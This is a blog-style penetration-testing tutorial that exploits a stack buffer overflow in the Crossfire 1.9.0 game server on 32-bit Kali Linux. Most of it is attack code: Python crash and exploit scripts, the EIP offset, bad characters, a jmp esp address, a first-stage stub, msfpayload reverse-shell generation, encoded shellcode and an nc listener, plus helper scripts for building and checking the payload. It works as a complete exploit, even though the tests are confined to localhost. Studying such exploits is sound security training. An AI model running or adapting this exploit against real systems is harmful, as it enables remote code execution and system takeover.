Little White Diary 18: Kali penetration testing, buffer overflow example (ii): Linux, Crossfire 1.9.0

Source: Internet
Author: User
Tags: iptables

Linux buffer overflow in Crossfire

Principle: Crossfire 1.9.0 has a stack buffer overflow in its handling of data received on an inbound socket connection (triggered below through the "setup sound" client command).

Tools:

Debugging tool: EDB (Evan's Debugger);

### Python is very convenient for overflow testing and exploit development, so the attack scripts below are written in Python.

Experimental target: Crossfire, a multiplayer online RPG game (server component)

Operating platform: Kali i686 virtual machine (32-bit). A CPU's bit width refers to the width of its address bus; a 64-bit system has a 2^64 address space, which is unwieldy to work with, so to keep this chapter simple a 32-bit system is used.

Building an experimental environment

# On Linux the game has to be installed together with its game folder.

Server-side program

root@kali:~# cd Desktop
root@kali:~/Desktop# ls
crossfire.tar.gz
root@kali:~/Desktop# mv crossfire.tar.gz /usr/games
root@kali:~/Desktop# cd /usr/games/
root@kali:/usr/games# ls
crossfire.tar.gz
root@kali:/usr/games# tar zxpf crossfire.tar.gz
root@kali:/usr/games# ls -lh
total 4.8M
drwxr-xr-x 8 root root 4.0K Feb        crossfire
-rwxrwx--- 1 root root 4.8M       05:16 crossfire.tar.gz
root@kali:/usr/games# cd crossfire/
root@kali:/usr/games/crossfire# cd bin/
root@kali:/usr/games/crossfire/bin# ls
crossedit  crossfire  crossfire-config  crossloop  crossloop.pl  player_dl.pl

# If some component is reported missing, install it; as long as the server prints "waiting for connect" it is basically working.

Check that the port is open (13327)

root@kali:~# netstat -pantu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:13327           0.0.0.0:*               LISTEN      4147/./crossfire
udp        0      0 0.0.0.0:68              0.0.0.0:*                           629/dhclient
Debugging tool

### EDB can also be started from the command line (see below).

Newer Linux kernels and toolchains support memory protection mechanisms:

DEP (non-executable stack), ASLR, stack cookies (stack-smashing protection). The target here is a 32-bit, non-PIE binary and the test is done on localhost, which is what makes the fixed addresses used below work.

Local debugging only: block outside network access to the vulnerable service during the test, so that nobody else can connect to the debugged server or to the reverse-shell port.

iptables -A INPUT -p tcp --destination-port 13327 \! -d 127.0.0.1 -j DROP   # only connections to 13327 on the loopback address, i.e. from this host, are accepted

iptables -A INPUT -p tcp --destination-port 4444 \! -d 127.0.0.1 -j DROP    # only connections to 4444 on the loopback address, i.e. from this host, are accepted

(The match is on the destination address, lowercase -d; uppercase -D would delete a rule instead. Anything addressed to the VM's real interface address is dropped, and only a local process can send to 127.0.0.1. The rules are not persistent and disappear after a reboot.)

root@kali:~# iptables -A INPUT -p tcp --destination-port 13327 \! -d 127.0.0.1 -j DROP
root@kali:~# iptables -A INPUT -p tcp --destination-port 4444 \! -d 127.0.0.1 -j DROP
root@kali:~# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
DROP       tcp  --  anywhere             !localhost            tcp dpt:13327
DROP       tcp  --  anywhere             !localhost            tcp dpt:4444

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination

Debugging tool

Start the service under the EDB debugger:

edb --run /usr/games/crossfire/bin/crossfire

# Debug -> Run has to be clicked twice before the server is actually running.

To read a register such as EIP, double-click it in the register pane.

01.py

#!/usr/bin/python
import socket

host = "127.0.0.1"

# Crossfire only overflows when the data sent has a particular size: with 4379
# bytes the overwrite lands exactly on the saved return address.
crash = "\x41" * 4379
buffer = "\x11(setup sound " + crash + "\x90\x90#)"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] sending evil buffer ..."
s.connect((host, 13327))
data = s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*] payload sent!"

If the overflow happens, EDB cannot execute the next instruction (EIP is 0x41414141) and shows an alert pop-up,


which confirms the buffer overflow vulnerability.

# By varying the number of "A" characters sent, verify that EIP is overwritten only when the count is 4379.

Locate the EIP position precisely with a unique (cyclic) string

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb 4379

Put the generated string into 02.py in place of the "A" characters and send it.

Double-click EIP to read the value it was overwritten with.

Use ./pattern_offset.rb with that EIP value to calculate the offset.

Result: the four bytes starting at offset 4368 are the ones that land in EIP.
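The offset calculation above can be reproduced offline. The following is an added example, not code from the original post or from Metasploit: it re-implements the cyclic pattern that pattern_create.rb emits and the lookup that pattern_offset.rb performs, assuming the 4379-byte crash buffer from the post. The EIP value used in the demonstration is simply read back from the pattern at the known offset, standing in for the value EDB would display.

```python
#!/usr/bin/env python3
"""Added example: Metasploit-style cyclic pattern and offset lookup, so the
4368 offset from the post can be reproduced without the Metasploit scripts."""
import string
import struct

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGIT = string.digits


def pattern_create(length):
    """Cyclic pattern Aa0Aa1Aa2...: the digit cycles fastest, then the lower-case
    letter, then the upper-case letter. Every 4-byte window is unique for the
    first 26*26*10*3 = 20280 bytes, which covers a 4379-byte buffer."""
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGIT:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern, eip_value):
    """Find where the 4 bytes now in EIP came from. eip_value is the dword as
    EDB shows it; x86 reads the stack little-endian, so it is packed with '<I'
    before searching. Returns -1 if EIP does not hold a pattern fragment
    (for example if the return address was never overwritten)."""
    needle = struct.pack("<I", eip_value)
    return pattern.find(needle)


if __name__ == "__main__":
    pat = pattern_create(4379)
    # Stand-in for reading EIP in EDB after sending 02.py: the dword at offset 4368.
    eip = struct.unpack("<I", pat[4368:4372])[0]
    print("EIP would read 0x%08x -> offset %d" % (eip, pattern_offset(pat, eip)))
```

Note that the value has to be entered as the register shows it (little-endian dword), not as the four characters seen in the stack dump; the pack call takes care of the byte order.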

Verify the location with 03.py (4368 filler bytes, then 4 distinct bytes that should appear in EIP).

Look at the data ESP points to in the Dump pane.

### Only 7 bytes of our data remain after the EIP overwrite, so ESP points at just 7 controllable bytes; shellcode cannot be placed there. Look at the other registers instead.

EAX turns out to be usable: it points at the start of the received command.

"setup sound " is a server command, so the first 12 characters sent must be "setup sound ".

One option is to take the address in EAX, add 12 and hard-code the result as the jump target. That works here, but it may fail on another machine, because the value of EAX differs between systems.

Idea (for portability):

First-stage shellcode: from the 7 bytes at ESP, jump to EAX after adding 12 to skip the "setup sound " prefix, which leaves EAX pointing at our data.

### The instruction sequence is 5 bytes, small enough for the space at ESP, and jumps to EAX:

\x83\xc0\x0c\xff\xe0\x90\x90  # \x83\xc0\x0c = add eax,0xc ; \xff\xe0 = jmp eax ; \x90\x90 = NOP padding to fill the 7 bytes. (Multi-byte values such as the EIP address are written little-endian, the reverse of the order a person reads them.)

04.py

Look at ESP again.

# The address in ESP is not fixed either, so instead of hard-coding it we need a fixed "jmp esp" instruction somewhere in the program.

Finding the address

Use EDB's opcode search plugin.

Search the first module, the crossfire binary itself, loaded at 08048000: it exists whenever the program runs and is always at the same address, so a jmp esp found in it is reliable.

### Chain: EIP -> jmp esp -> stub at ESP (add eax,0xc ; jmp eax) -> shellcode at EAX+12

Find bad characters

### Result: \x00\x0a\x0d\x20

Send all 256 byte values from the script and check in the dump which ones are dropped, altered, or cut the data short.
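The bad-character hunt is done by hand in the post (send the probe, inspect the dump, exclude the offending byte, repeat). The following is an added example, not code from the original post: it builds the 256-byte probe and compares a memory dump against what was sent, reporting the first byte that was mangled. The `fake_server` function is a constructed stand-in for "send it and read the ESP dump in EDB"; it is written to drop \x0a and \x0d and to stop at \x20, so that the loop arrives at the same set the post found. The real server's behaviour is only known from the post's result.

```python
#!/usr/bin/env python3
"""Added example: bad-character probe generation and dump comparison."""


def badchar_probe(exclude=b""):
    """All byte values 0x00..0xff except the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)


def first_corruption(sent, dumped):
    """Return (offset, byte) of the first position where the copy in memory
    differs from the bytes sent, or None if the dump reproduces the probe.
    A truncated dump is reported at the point where it ends."""
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return i, b
    return None


def find_bad_chars(send_and_dump):
    """Iterate the way the post does by hand: send the probe, look at the
    dump, exclude the byte that broke it, send again until the dump matches.
    send_and_dump(probe) must return the bytes seen in memory."""
    bad = bytearray(b"\x00")  # NUL terminates a C string; always excluded first
    while True:
        probe = badchar_probe(bytes(bad))
        hit = first_corruption(probe, send_and_dump(probe))
        if hit is None:
            return bytes(bad)
        bad.append(hit[1])


def fake_server(data):
    """Constructed stand-in for the target: strips \\x0a and \\x0d and stops
    reading at \\x20. Not a description of the real Crossfire server."""
    out = bytearray()
    for b in data:
        if b == 0x20:
            break
        if b not in (0x0a, 0x0d):
            out.append(b)
    return bytes(out)


if __name__ == "__main__":
    print("bad chars:", find_bad_chars(fake_server).hex())
```

In the real procedure `send_and_dump` is a person with EDB open; the point of the comparison function is that a byte which truncates the data (like the space here) shows up as a short dump, not as a changed byte, and both cases must be treated as bad.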

Set a breakpoint on the jmp esp found by the search (0x08134597).

EIP -> 08134597

The EIP value written into the buffer (little-endian) is therefore:

crash = "\x41" * 4368 + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"   # 4368 filler, EIP = jmp esp, 7-byte stub executed at ESP (add eax,0xc ; jmp eax ; nops)

04+.py

Set the breakpoint.

Run [F9].

Press F8 to single-step.

Press F8 again: execution of the jmp esp lands in our stub at ESP.

Replace the beginning of the 4368 filler bytes with the shellcode and keep filling the remainder with "A" (the filler count is 4368 minus the shellcode length).

Generating the shellcode

root@kali:/usr/share/framework2# ./msfpayload linux_ia32_reverse LHOST=127.0.0.1 LPORT=4444 R | ./msfencode -b "\x00\x0a\x0d\x20"

Note: if the generated shellcode does not work, regenerating it after a reboot resolved it.

#!/usr/bin/python
import socket

host = "127.0.0.1"

# 105 bytes of msfencode output (linux_ia32_reverse, LHOST=127.0.0.1, LPORT=4444),
# encoded to avoid \x00\x0a\x0d\x20
shellcode = ("\xbb\x6d\x65\x9b\xcd\xdb\xdd\xd9\x74\x24\xf4\x5f\x2b\xc9"
             "\xb1\x14\x83\xc7\x04\x31\x5f\x10\x03\x5f\x10\x8f\x90\xaa"
             "\x16\xb8\xb8\x9e\xeb\x15\x55\x23\x65\x78\x19\x45\xb8\xfa"
             "\x01\xd4\x10\x92\xb7\xe8\x85\x3e\xd2\xf8\xf4\xee\xab\x18"
             "\x9c\x68\xf4\x17\xe1\xfd\x45\xac\x51\xf9\xf5\xca\x58\x81"
             "\xb5\xa2\x05\x4c\xb9\x50\x90\x24\x85\x0e\xee\x38\xb0\xd7"
             "\x08\x50\x6c\x07\x9a\xc8\x1a\x78\x3e\x61\xb5\x0f\x5d\x21"
             "\x1a\x99\x43\x71\x97\x54\x03")

# Layout: shellcode at the start of the data (this is where EAX+12 points),
# "A" padding up to offset 4368, the jmp esp address (little-endian),
# then the 7-byte first-stage stub that runs at ESP.
crash = shellcode + "A" * (4368 - 105) + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"
buffer = "\x11(setup sound " + crash + "\x90\x90#)"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] sending evil buffer ..."
s.connect((host, 13327))
data = s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*] payload sent!"

# Open a listener on port 4444 first: the payload is a reverse shell, so the shell arrives when the server connects back to 4444.

nc -lvp 4444   ### the shell is obtained here once the exploit script has been run
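Before sending a payload it is worth checking that the buffer really has the layout derived above (shellcode at EAX+12, EIP at offset 4368, exactly 7 stub bytes at ESP, no bad characters anywhere). The following is an added example, not code from the original post: a Python 3 builder that assembles the message from the same parts the final script uses and exposes the resulting positions for comparison with EDB. The 105-byte int3 sled is a constructed stand-in for the real shellcode; it makes the debugger break as soon as control reaches it, which is a convenient way to confirm the chain before using the msfencode output.

```python
#!/usr/bin/env python3
"""Added example: build and sanity-check the Crossfire 'setup sound' message."""
import struct

PREFIX = b"\x11(setup sound "   # framing + 12-byte command; EAX points at "setup"
SUFFIX = b"\x90\x90#)"
CRASH_LEN = 4379                 # data size at which the overflow lands on the return address
EIP_OFFSET = 4368                # found with pattern_create / pattern_offset
JMP_ESP = 0x08134597             # jmp esp inside the crossfire binary (fixed load address)
BAD = b"\x00\x0a\x0d\x20"        # bad characters found in the post
STAGE1 = b"\x83\xc0\x0c" + b"\xff\xe0"   # add eax,0xc ; jmp eax


def build_crash(shellcode):
    """[shellcode][A padding][EIP little-endian][stage-1 stub padded with NOPs]"""
    esp_room = CRASH_LEN - EIP_OFFSET - 4       # bytes left after the EIP overwrite: 7
    if len(STAGE1) > esp_room:
        raise ValueError("stub does not fit at ESP")
    stub = STAGE1 + b"\x90" * (esp_room - len(STAGE1))
    pad_len = EIP_OFFSET - len(shellcode)
    if pad_len < 0:
        raise ValueError("shellcode too long: %d > %d" % (len(shellcode), EIP_OFFSET))
    crash = shellcode + b"A" * pad_len + struct.pack("<I", JMP_ESP) + stub
    assert len(crash) == CRASH_LEN
    return crash


def build_message(shellcode):
    """Full wire message; refuses to build if any bad character slipped in."""
    crash = build_crash(shellcode)
    present = bytes(sorted(set(b for b in crash if b in BAD)))
    if present:
        raise ValueError("bad chars present: %r" % present)
    return PREFIX + crash + SUFFIX


def layout(msg):
    """Positions to compare with EDB: EAX+12 should point at shellcode_at,
    EIP should read eip, and the dump at ESP should show esp_bytes."""
    eip_at = len(PREFIX) + EIP_OFFSET
    return {
        "shellcode_at": len(PREFIX),
        "eip": struct.unpack("<I", msg[eip_at:eip_at + 4])[0],
        "esp_bytes": msg[eip_at + 4:eip_at + 4 + 7],
    }


if __name__ == "__main__":
    # Constructed stand-in shellcode: 105 x int3, same length as the msfencode output.
    msg = build_message(b"\xcc" * 105)
    print(layout(msg))
```

The builder is deliberately strict: a shellcode longer than 4368 bytes, a stub longer than the 7 bytes at ESP, or a bad byte anywhere in the data raises before anything is sent, which are exactly the three mistakes that otherwise show up only as a confusing crash in EDB.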

Little White Diary, to be continued ...
